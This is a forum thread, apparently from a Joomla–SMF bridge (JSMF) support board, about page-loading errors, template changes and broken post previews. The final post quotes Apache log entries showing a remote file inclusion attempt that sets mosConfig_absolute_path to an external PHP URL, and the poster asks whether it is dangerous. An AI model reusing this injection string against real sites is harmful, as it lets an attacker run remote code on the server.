I'm not seeing it, it may be related to your template.

Is there really no one other than Gustavo and I that are having this problem with 1.0.10? I would like to know one thing... Has this been tested with PHP 5.0.4-10.5?

You know, I still have the problem I had with 1.1.3, and 1.1.1. The page loads to a point, but does not go beyond. I also have tried copying in the index.php file. What version of PHP has this been tested with? I am wondering if that might be a problem. Another thought might be something doing with the php.ini file, as I also have problem running the googlemap component from another person. Variables seem to be funky depending on the php version has been developed for.

See below for the other post I had...

Okay, so I sat up and stepped through the code and found that as I step through the $path, I end up with a failure on the call in com_content. I think this must be a masking of an issue from another spot. May there be a global variable in com_smf that might be interferring with Joomla and how it is displaying? Is there notes on doing a manual patch of index.php? I am willing to help look through this. You can PM me and I will try and make a work around.

I stepped through the index.php file and followed it to the content.php file where it finally stops showing at. Anyone have ideas?

BTW, this works on my other server, but going back to that server is not an option as I am going to go on to develop a full GIS server that needs to have the supporting forum to work with it.

Thanks for any assistance that can be given.

and enabling php error logging gives you what errors?  How about when you set joomla error reporting to maximum?  And why the specific outdated version of php, webhost related?

I have changed several templates, got same error message.
I think it is Chinese ver Joomla's problem, I will report to them.
Thanks for help!

Thanks noel, sometimes the bug reports aren't clear and I don't fully understand the problem at first.  Thanks to some of you for making me see what was going on... you all make the bridge better.

Yep even though I am not sure I have the latest version of JSMF login / recent topics module..

editing jos_menu allows you to keep the same ItemID for com_smf. for example on this site, it's "option,com_smf/Itemid,94"... 94 is the ItemID.

Sorry to seek help again. I have tried to change the J! and SMF templates back to their default, but I still get the error message with IE.

In addition, I found that the "Preview" function of post new topic/edit old topic does not work properly. It stayes on "reading preview" but the preview never display. And I got another "getElementsByTabName(...) is null or not an oject" error message. This problem happen on both IE and firefox.

Does anyone have idea of where I should check?

Hello,
I am using Joomla 1.0.10, Simple Machines Forum 1.1RC2, Community Builder 1.0RC2  and your JSMF 1.1.4.
When i check my Apache log files, i can see several lines like the following :

Code:
69.10.136.167 www.mydomain.com - [23/Jul/2006:19:44:19 +0200] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://www.podgorz.cc/e.php?? HTTP/1.0" 200 156 "-" "Mozilla/5.0"

69.10.136.167 www.mydomain.com - [23/Jul/2006:19:44:19 +0200] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://www.podgorz.cc/e.php?? HTTP/1.0" 200 156 "-" "Mozilla/5.0"

Apparently, someone is trying to hack my site. How can this be harmfull for my site ?
I guess the JSMF is secured against this kind of attack ?
